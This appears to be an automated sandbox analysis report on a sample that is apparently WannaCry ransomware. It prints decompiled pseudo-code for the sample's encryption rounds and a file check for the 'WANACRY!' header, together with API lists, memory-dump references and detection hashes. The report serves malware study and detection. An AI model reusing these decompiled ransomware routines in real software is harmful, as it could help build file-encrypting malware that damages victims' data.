											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
											_a16 = _a16 + 1;
											if(_t329 == 8) {
												_t216 = _t352 + 0x418;
												_t303 = 3;
												do {
													 *_t216 =  *_t216 ^  *(_t216 - 4);
													_t216 =  &(_t216[1]);
													_t303 = _t303 - 1;
												} while (_t303 != 0);
												_t217 =  *(_t352 + 0x420);
												_a4 = _t217;
												_t220 = _t352 + 0x428;
												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
												_t313 = 3;
												do {
													 *_t220 =  *_t220 ^  *(_t220 - 4);
													_t220 =  &(_t220[1]);
													_t313 = _t313 - 1;
												} while (_t313 != 0);
												L46:
												_a4 = _a4 & 0x00000000;
												if(_t329 <= 0) {
													goto L50;
												}
												_t314 = _t352 + 0x414;
												while(_a8 < _t345) {
													asm("cdq");
													_t347 = _a8 / _a12;
													asm("cdq");
													_t337 = _a8 % _a12;
													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
													_a4 = _a4 + 1;
													_t345 = _v12;
													_t338 =  *_t314;
													_t314 = _t314 + 4;
													_a8 = _a8 + 1;
													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
													_t329 = _v8;
													if(_a4 < _t329) {
														continue;
													}
													goto L50;
												}
												goto L51;
											}
											if(_t329 <= 1) {
												goto L46;
											}
											_t229 = _t352 + 0x418;
											_t315 = _t329 - 1;
											do {
												 *_t229 =  *_t229 ^  *(_t229 - 4);
												_t229 =  &(_t229[1]);
												_t315 = _t315 - 1;
											} while (_t315 != 0);
											goto L46;
											L50:
										} while (_a8 < _t345);
										goto L51;
									}
									_t316 = _t352 + 0x414;
									while(_a8 < _t345) {
										asm("cdq");
										_a4 = _a8 / _a12;
										asm("cdq");
										_t340 = _a8 % _a12;
										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
										_a8 = _a8 + 1;
										_t341 =  *_t316;
										_t316 = _t316 + 4;
										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
										_t329 = _v8;
										if(_a8 < _t329) {
											continue;
										}
										goto L35;
									}
									goto L51;
								}
								_a8 = _t329;
								do {
									_t317 =  &(_t291[1]);
									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
									_t319 =  &(_t317[2]);
									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
									_t291 =  &(_t319[1]);
									_t205 =  &(_t205[1]);
									_t60 =  &_a8;
									 *_t60 = _a8 - 1;
								} while ( *_t60 != 0);
								goto L31;
							}
							_t280 = _t352 + 0x1e8;
							do {
								_t320 = _a12;
								if(_t320 > 0) {
									memset(_t280, 0, _t320 << 2);
									_t354 = _t354 + 0xc;
								}
								_t327 = _t327 + 1;
								_t280 = _t280 + 0x20;
							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
							goto L28;
						}
						_t281 = _t352 + 8;
						do {
							_t322 = _a12;
							if(_t322 > 0) {
								memset(_t281, 0, _t322 << 2);
								_t354 = _t354 + 0xc;
							}
							_t326 = _t326 + 1;
							_t281 = _t281 + 0x20;
						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
						goto L23;
					}
					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
					goto L18;
				}
			}

















































                    0x00402a83
                    0x00402a85
                    0x00402a8e
                    0x00402a95
                    0x00402a9e
                    0x00402aa3
                    0x00402aa4
                    0x00402aa4
                    0x00402aa9
                    0x00402aae
                    0x00402ab1
                    0x00402ab4
                    0x00402ac2
                    0x00402ac6
                    0x00402acd
                    0x00402ad6
                    0x00402adb
                    0x00402adc
                    0x00402adc
                    0x00402ae1
                    0x00402ae6
                    0x00402af4
                    0x00402af8
                    0x00402aff
                    0x00402b05
                    0x00402b08
                    0x00402b0d
                    0x00402b0e
                    0x00402b0e
                    0x00402b14
                    0x00402b23
                    0x00402b2a
                    0x00402b3f
                    0x00402b44
                    0x00402b4a
                    0x00402b4f
                    0x00402b75
                    0x00402b7d
                    0x00402b92
                    0x00402b7f
                    0x00402b81
                    0x00402b81
                    0x00000000
                    0x00402b51
                    0x00402b53
                    0x00402b70
                    0x00402b94
                    0x00402b94
                    0x00402b9a
                    0x00402ba2
                    0x00402ba3
                    0x00402ba6
                    0x00402bae
                    0x00402bb1
                    0x00402bcf
                    0x00402bcf
                    0x00402bd7
                    0x00402bf8
                    0x00402c00
                    0x00402c01
                    0x00402c0b
                    0x00402c0e
                    0x00402c12
                    0x00402c15
                    0x00402c17
                    0x00402c1f
                    0x00402c22
                    0x00402c4e
                    0x00402c4e
                    0x00402c54
                    0x00402ca5
                    0x00402ca8
                    0x00402e04
                    0x00402e06
                    0x00402e0d
                    0x00402e10
                    0x00402e73
                    0x00402e73
                    0x00402e7b
                    0x00402e7b
                    0x00402e18
                    0x00402e1b
                    0x00402e1b
                    0x00402e20
                    0x00000000
                    0x00000000
                    0x00402e22
                    0x00402e25
                    0x00402e25
                    0x00402e29
                    0x00402e59
                    0x00402e5b
                    0x00402e5e
                    0x00402e5e
                    0x00402e61
                    0x00402e61
                    0x00402e64
                    0x00402e68
                    0x00402e6b
                    0x00000000
                    0x00402e1b
                    0x00402cae
                    0x00402cb5
                    0x00402cb5
                    0x00402cbf
                    0x00402d05
                    0x00402d0b
                    0x00402d11
                    0x00402d34
                    0x00402d3a
                    0x00402d3b
                    0x00402d3e
                    0x00402d40
                    0x00402d43
                    0x00402d43
                    0x00402d46
                    0x00402d4e
                    0x00402d8f
                    0x00402d95
                    0x00402d9b
                    0x00402d9c
                    0x00402d9f
                    0x00402da1
                    0x00402da4
                    0x00402da4
                    0x00402da7
                    0x00402da7
                    0x00402dad
                    0x00000000
                    0x00000000
                    0x00402daf
                    0x00402db5
                    0x00402dbf
                    0x00402dc3
                    0x00402dc8
                    0x00402dc9
                    0x00402dcf
                    0x00402ddb
                    0x00402dde
                    0x00402de4
                    0x00402de6
                    0x00402de9
                    0x00402dec
                    0x00402df3
                    0x00402df9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402df9
                    0x00000000
                    0x00402db5
                    0x00402d16
                    0x00000000
                    0x00000000
                    0x00402d1c
                    0x00402d22
                    0x00402d25
                    0x00402d28
                    0x00402d2a
                    0x00402d2d
                    0x00402d2d
                    0x00000000
                    0x00402dfb
                    0x00402dfb
                    0x00000000
                    0x00402cb5
                    0x00402c56
                    0x00402c5c
                    0x00402c6a
                    0x00402c6e
                    0x00402c74
                    0x00402c75
                    0x00402c7e
                    0x00402c8b
                    0x00402c91
                    0x00402c93
                    0x00402c96
                    0x00402c9d
                    0x00402ca3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402ca3
                    0x00000000
                    0x00402c5c
                    0x00402c24
                    0x00402c27
                    0x00402c2d
                    0x00402c2e
                    0x00402c36
                    0x00402c3f
                    0x00402c43
                    0x00402c45
                    0x00402c46
                    0x00402c49
                    0x00402c49
                    0x00402c49
                    0x00000000
                    0x00402c27
                    0x00402bd9
                    0x00402bdf
                    0x00402bdf
                    0x00402be4
                    0x00402bea
                    0x00402bea
                    0x00402bea
                    0x00402bec
                    0x00402bed
                    0x00402bf0
                    0x00000000
                    0x00402bdf
                    0x00402bb3
                    0x00402bb6
                    0x00402bb6
                    0x00402bbb
                    0x00402bc1
                    0x00402bc1
                    0x00402bc1
                    0x00402bc3
                    0x00402bc4
                    0x00402bc7
                    0x00000000
                    0x00402bb6
                    0x00402b55
                    0x00000000
                    0x00402b55

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
                    • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
                    • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
                    • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
                    • memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
                    • memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrow$memcpy
                    • String ID:
                    • API String ID: 1881450474-3916222277
                    • Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                    • Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
                    • Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                    • Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004014A6 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 178filememoryCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
                    • memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
                    • GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
                    • _local_unwind2.MSVCRT(?,000000FF), ref: 004016D6
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
                    • String ID: WANACRY!
                    • API String ID: 283026544-1240840912
                    • Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                    • Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
                    • Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                    • Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040350F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 214COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 55%
                    			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E00402E7E(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x28;
					do {
						if(_t274 > 0) {
							_t34 =  &_v28; // 0x403b51
							_t260 =  *_t34;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_t100 =  &_v28; // 0x403b51
					_v44 =  *_t100 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}


































                    0x00403517
                    0x0040351e
                    0x00403528
                    0x00403531
                    0x00403536
                    0x00403537
                    0x00403537
                    0x0040353c
                    0x00403545
                    0x00000000
                    0x0040354f
                    0x0040355b
                    0x0040355c
                    0x0040355d
                    0x0040355f
                    0x0040356e
                    0x00403572
                    0x0040357d
                    0x0040358c
                    0x0040358f
                    0x00403592
                    0x00403598
                    0x0040359d
                    0x004035a0
                    0x004035a3
                    0x004035a6
                    0x004035ac
                    0x004035ad
                    0x004035b5
                    0x004035be
                    0x004035bf
                    0x004035c4
                    0x004035c9
                    0x004035cd
                    0x004035d0
                    0x004035d3
                    0x004035d5
                    0x004035d5
                    0x004035d5
                    0x004035a6
                    0x004035dc
                    0x004035e3
                    0x004035e6
                    0x004035ef
                    0x004035f2
                    0x004035f4
                    0x004035fd
                    0x004035fd
                    0x00403600
                    0x00403608
                    0x0040360b
                    0x00403613
                    0x00403619
                    0x0040361c
                    0x0040361f
                    0x00403627
                    0x0040363a
                    0x0040363d
                    0x00403660
                    0x00403682
                    0x00403688
                    0x0040368a
                    0x0040368d
                    0x00403690
                    0x00403690
                    0x00403690
                    0x0040361f
                    0x004036a9
                    0x004036ae
                    0x004036b2
                    0x004036b5
                    0x004036b8
                    0x004036bb
                    0x004035f2
                    0x004036c7
                    0x004036cd
                    0x004036d3
                    0x004036d6
                    0x004036df
                    0x004036e2
                    0x004036e7
                    0x004036ef
                    0x004036f2
                    0x00403701
                    0x00403709
                    0x0040371f
                    0x00403726
                    0x00403727
                    0x00403741
                    0x00403745
                    0x0040374a
                    0x00403760
                    0x00403767
                    0x00403768
                    0x0040377d
                    0x00403780
                    0x00403782
                    0x00403783
                    0x00403786
                    0x00403787
                    0x004036f2
                    0x00403794

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrowmemcpy
                    • String ID: $Q;@
                    • API String ID: 2382887404-262343263
                    • Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                    • Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
                    • Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                    • Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403797 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 54%
                    			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E004031BC(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 0x1e8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x208;
					do {
						if(_t274 > 0) {
							_t260 = _v28;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_v44 = _v28 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}


































                    0x0040379f
                    0x004037a6
                    0x004037b0
                    0x004037b9
                    0x004037be
                    0x004037bf
                    0x004037bf
                    0x004037c4
                    0x004037cd
                    0x00000000
                    0x004037d7
                    0x004037e3
                    0x004037e4
                    0x004037e5
                    0x004037e7
                    0x004037f6
                    0x004037fa
                    0x00403805
                    0x00403814
                    0x00403817
                    0x0040381a
                    0x00403820
                    0x00403828
                    0x0040382b
                    0x0040382e
                    0x00403831
                    0x00403837
                    0x00403838
                    0x00403840
                    0x00403849
                    0x0040384a
                    0x0040384f
                    0x00403854
                    0x00403858
                    0x0040385b
                    0x0040385e
                    0x00403860
                    0x00403860
                    0x00403860
                    0x00403831
                    0x00403867
                    0x0040386e
                    0x00403871
                    0x0040387d
                    0x00403880
                    0x00403882
                    0x0040388b
                    0x0040388e
                    0x00403896
                    0x00403899
                    0x004038a1
                    0x004038a7
                    0x004038aa
                    0x004038ad
                    0x004038b5
                    0x004038c8
                    0x004038cb
                    0x004038ee
                    0x00403910
                    0x00403916
                    0x00403918
                    0x0040391b
                    0x0040391e
                    0x0040391e
                    0x0040391e
                    0x004038ad
                    0x00403937
                    0x0040393c
                    0x00403940
                    0x00403943
                    0x00403946
                    0x00403949
                    0x00403880
                    0x00403955
                    0x0040395b
                    0x00403961
                    0x00403964
                    0x0040396d
                    0x00403975
                    0x0040397d
                    0x00403980
                    0x0040398f
                    0x0040399a
                    0x004039b0
                    0x004039b7
                    0x004039b8
                    0x004039d2
                    0x004039d6
                    0x004039db
                    0x004039f1
                    0x004039f8
                    0x004039f9
                    0x00403a0e
                    0x00403a11
                    0x00403a13
                    0x00403a14
                    0x00403a17
                    0x00403a18
                    0x00403980
                    0x00403a25

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrowmemcpy
                    • String ID:
                    • API String ID: 2382887404-3916222277
                    • Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                    • Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
                    • Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                    • Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004029CC Relevance: 3.8, APIs: 3, Instructions: 55memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004029CC(void* _a4) {
				void* _t17;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t25;
				signed int _t35;
				void* _t37;

				_t37 = _a4;
				if(_t37 != 0) {
					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
						_t25 =  *((intOrPtr*)(_t37 + 4));
						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
					}
					if( *(_t37 + 8) == 0) {
						L9:
						_t18 =  *((intOrPtr*)(_t37 + 4));
						if(_t18 != 0) {
							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
						}
						return HeapFree(GetProcessHeap(), 0, _t37);
					} else {
						_t35 = 0;
						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
							L8:
							free( *(_t37 + 8));
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
							if(_t23 != 0) {
								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
							}
							_t35 = _t35 + 1;
						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
						goto L8;
					}
				}
				return _t17;
			}









                    0x004029ce
                    0x004029d6
                    0x004029db
                    0x004029df
                    0x004029ea
                    0x004029ea
                    0x004029ef
                    0x00402a1d
                    0x00402a1d
                    0x00402a22
                    0x00402a2e
                    0x00402a31
                    0x00000000
                    0x004029f1
                    0x004029f2
                    0x004029f7
                    0x00402a12
                    0x00402a15
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004029f9
                    0x004029f9
                    0x004029fc
                    0x00402a01
                    0x00402a07
                    0x00402a0b
